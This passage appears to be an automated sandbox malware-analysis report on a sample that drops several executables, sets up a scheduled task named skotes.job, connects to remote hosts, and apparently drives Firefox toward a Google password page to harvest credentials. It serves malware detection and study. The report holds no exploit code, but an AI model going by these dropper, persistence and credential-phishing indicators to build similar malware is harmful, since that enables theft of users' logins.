Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.00000170831BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.00000170844CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3178327332.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.hulu.com/watch/
Source: firefox.exe, 0000001B.00000003.3203526143.000001708CD58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.instagram.com/
Source: firefox.exe, 0000001B.00000003.3142865401.0000017084B64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B8F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mobilesuica.com/
Source: file.exe, 00000000.00000003.2183302624.0000000005772000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3094262647.0000000005E33000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3203132359.0000000005A6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.or
Source: file.exe, 00000000.00000003.2183302624.0000000005772000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3094262647.0000000005E33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3335798866.0000017085628000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3271364302.0000017080000000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BD42000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.00000170831F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3335798866.0000017085615000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.0000017083117000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3203132359.0000000005A6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001B.00000002.3306081297.0000017084582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/
Source: 26e226f915.exe, 0000000D.00000003.3094784478.0000000006106000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3204452985.0000000005C85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3145541986.0000017085580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: 26e226f915.exe, 0000000D.00000003.3094784478.0000000006106000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3204452985.0000000005C85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: 26e226f915.exe, 0000000D.00000003.3094784478.0000000006106000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3335798866.0000017085605000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3204452985.0000000005C85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-mod
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3271364302.0000017080000000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/resource://gre/modules/PromiseUtils.sys.mjsresource://gre/module
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sling.com/
Source: file.exe, 00000000.00000003.2183850637.000000000573A000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3109202383.0000000005E22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3217655123.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219276546.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219501177.0000000005975000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001137000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3129585316.000001708BE81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.00000170844CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3296944839.00000170839BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3327365979.0000017085290000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001B.00000002.3298702178.0000017083BCA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.000001708441B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 0000001B.00000002.3303896282.0000017084303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3321587430.0000017084F3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.00000170831A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3303238080.0000017084239000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3303896282.00000170843A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.000001708441B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3312875221.0000017084DF8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.00000170844CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3326376483.000001708512A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.0000017084499000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708313F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000019.00000002.3069443175.00000181E6B47000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3078393329.000001D91287A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdDownloader:onStopReq
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdfirefox-desktop-pass
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50086 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49995 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50003 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50004 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50005 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50010 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:50017 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50024 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50028 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50034 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50036 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50044 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50045 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50050 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50056 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50060 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50077 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50082 version: TLS 1.2

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: 90bef5afae.exe, 0000000E.00000000.3036690309.00000000006D2000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_797f023c-1
Source: 90bef5afae.exe, 0000000E.00000000.3036690309.00000000006D2000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_32466ea3-2
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name:
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name: .idata
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name:
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name:
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name: .rsrc
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name: .idata
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name:
Source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe.0.dr Static PE information: section name:
Source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: random[1].exe.9.dr Static PE information: section name:
Source: random[1].exe.9.dr Static PE information: section name: .rsrc
Source: random[1].exe.9.dr Static PE information: section name: .idata
Source: 26e226f915.exe.9.dr Static PE information: section name:
Source: 26e226f915.exe.9.dr Static PE information: section name: .rsrc
Source: 26e226f915.exe.9.dr Static PE information: section name: .idata
Source: random[1].exe0.9.dr Static PE information: section name:
Source: random[1].exe0.9.dr Static PE information: section name: .rsrc
Source: random[1].exe0.9.dr Static PE information: section name: .idata
Source: random[1].exe0.9.dr Static PE information: section name:
Source: ef2532c0b1.exe.9.dr Static PE information: section name:
Source: ef2532c0b1.exe.9.dr Static PE information: section name: .rsrc
Source: ef2532c0b1.exe.9.dr Static PE information: section name: .idata
Source: ef2532c0b1.exe.9.dr Static PE information: section name:
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name:
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name: .idata
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name:
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name:
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name: .rsrc
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name: .idata
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name:
Source: 1USEAVXFST1CCUTT4RKEBB0FQ1.exe.13.dr Static PE information: section name:
Source: 1USEAVXFST1CCUTT4RKEBB0FQ1.exe.13.dr Static PE information: section name: .idata
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name:
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name: .idata
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name:
PE file has a writeable .text section
Source: num[1].exe.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B06AB1 0_3_00B06AB1
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Code function: 6_2_00C1F989 6_2_00C1F989
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Code function: 6_2_00C1F952 6_2_00C1F952
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Code function: 6_2_00C1F97E 6_2_00C1F97E
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Code function: 6_2_00C1FD52 6_2_00C1FD52
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_00840228 11_2_00840228
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0086E8A0 11_2_0086E8A0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0087A0D0 11_2_0087A0D0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_00842030 11_2_00842030
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0083A850 11_2_0083A850
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0083E1A0 11_2_0083E1A0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_00835160 11_2_00835160
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_00874A40 11_2_00874A40
